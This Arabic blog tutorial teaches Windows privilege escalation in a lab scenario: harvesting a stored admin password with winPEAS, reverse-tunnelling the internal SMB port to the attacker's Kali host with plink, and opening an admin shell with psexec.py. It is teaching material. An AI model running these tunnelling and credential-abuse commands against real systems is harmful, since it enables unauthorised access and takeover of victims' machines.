Windows PE Port Forwarding

Jehad Alqurashiمنذ سنتين

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

 

مقدمة:

في هذي المقالة راح اشرح لكم عن كيف نرفع صلاحيتنا عن طريق Port Forwarding

خلونا نفهم اول شي ايش ال Port Forwarding بعض الاحيان بعد ماتخترق الجهاز يكون فيه بورتات داخلية هذي البورتات الداخلية ممكن تكون مصابة بثغرة معينة وشغالة بصلاحية عالية او انه ممكن تستفيد منها عموما ف رفع الصلاحيات.

ملاحظة: السيناريو جزء منه راح يعتمد على تكنينك سابق

 

راح نشوف السيناريو مع بعض وراح يوضح معكم كل شي

 

 

الشرح:

طيب اول شي انا داخل بيوزر محدود الصلاحية كالعادة اللي هو user

يعد كذا راح استخدم اداة winpease وشرحنا كيف ننلقها الى النظام المخترق في الاجزاء السابقة

راح نسوي رن لي winpease ونشوف النتائج مع بعض

 

 نلاحظ انه لقي لنا الباسورد الخاص بالادمن عن طريق الريجستري

ملاحظة: قد شرحت هذا التكنيك قبل ف اللي وده يطلع عليه هذا هو stored-credentials

طيب لو نجي نسوي scan للبورتات عن طريق اداة Nmap عشان نشوف اذا بورت ال smb او ال RDP مفتوحين او لا عشان نسجل دخول بيوزر الادمن عن طريقهم

نلاحظ ان لا بورت ال smb مفتوح ولا ال RDP

طيب ممكن بورت ال smb او ال RDP مفتوح داخليا راح نعرف عن طريق امر:

netstat -a

 

 

نلاحظ انه فعلا بورت ال SMB مفتوح داخليا طيب كيف راح نتصل عليه ؟

راح نستخدم ال ssh واداة plink.exe عشان نقدر نفتح بورت على الكالي ومن خلال هذا البورت نقدر نمرر اتصالنا لبورت ال SMB الداخلي

الاداة على قيت اب: plink

 

طيب قبل نبدا لازم نعدل شي على اعدادات ال ssh

راح نروح لملف: etc/ssh/sshd_config/

ونبحث فيه عن PermitRootLogin ونغير قيمته الى yes ونشيل علامة الهاشتاق اللي قبله

 بعد كذا تسوي ريستارت الى ال ssh عن طريق هذا الامر:

service ssh restart

  بعد كذا ننقل اداة plink للجهاز المخترق وننفذ هذا الامر:

plink.exe [email protected] -R 445:127.0.0.1:445

 

طبعا انت راح تعدل على الامر بشي بسيط راح تحط بعد ال @ الايبي الخاص بالكالي والباقي اتركه زي ماهو

بعد كذا راح يطلبك الباسورد الخاص بالروت راح تحطه وبعد كذا راح يكون بورت ال SMB الداخلي الخاص بالوندوز مفتوح على الكالي

طيب خلونا نتاكد هل بورت ال SMB فعلا انفتح على الكالي او لا راح ننفذ هذا الامر عشان نتاكد:

netstat -tlp

 زي مانلاحظ قدرنا نسحب بورت smb الداخلي الخاص بالوندوز واللحين نقدر نتصل فيه وندخل بالحساب الخاص بالادمن بما انه عندنا الباسورد

الان راح استخدم اداة psexec هذي الاداة راح اعطيها الايبي المحلي و اليوزر و الباسورد الخاص بالادمن وراح ترفع ملف خبيث وتفتح لك جلسة بصلاحية الادمن

psexec.py admin:[email protected] cmd

رابط الاداة على قيت اب:

psexec.py

 

كلمات دليلية: hacking privilege
0
إعجاب
1346
مشاهدات
0
مشاركة
1
متابع

التعليقات (0)

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !